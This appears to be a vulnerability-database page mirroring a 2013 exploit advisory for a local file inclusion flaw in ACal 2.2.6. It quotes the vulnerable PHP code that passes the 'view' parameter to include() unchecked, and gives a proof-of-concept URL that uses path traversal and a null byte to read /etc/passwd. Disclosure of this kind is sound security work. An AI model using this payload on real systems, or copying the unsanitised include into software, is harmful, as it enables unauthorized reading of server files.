Lucene search
K

ACal 2.2.6 (example.php, view param) - Local File Inclusion Vulneberality

🗓️ 15 Aug 2013 00:00:00Reported by ICheer_No0MType 
zdt
 zdt
🔗 0day.today👁 15 Views

Local File Inclusion Vulneberality in ACal 2.2.6 (example.php

Code
---> Vuln Code : /embled/example/example.php
    
12. $path = "../../"; 
...
25. if (!isset($_GET['view'])) {
26.     include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On)
27. }
28. else {
29.     include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte
30. }
     
---> Exploit/Proof of Concept (PoC)
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Aug 2013 00:00Current
7.1High risk
Vulners AI Score7.1
15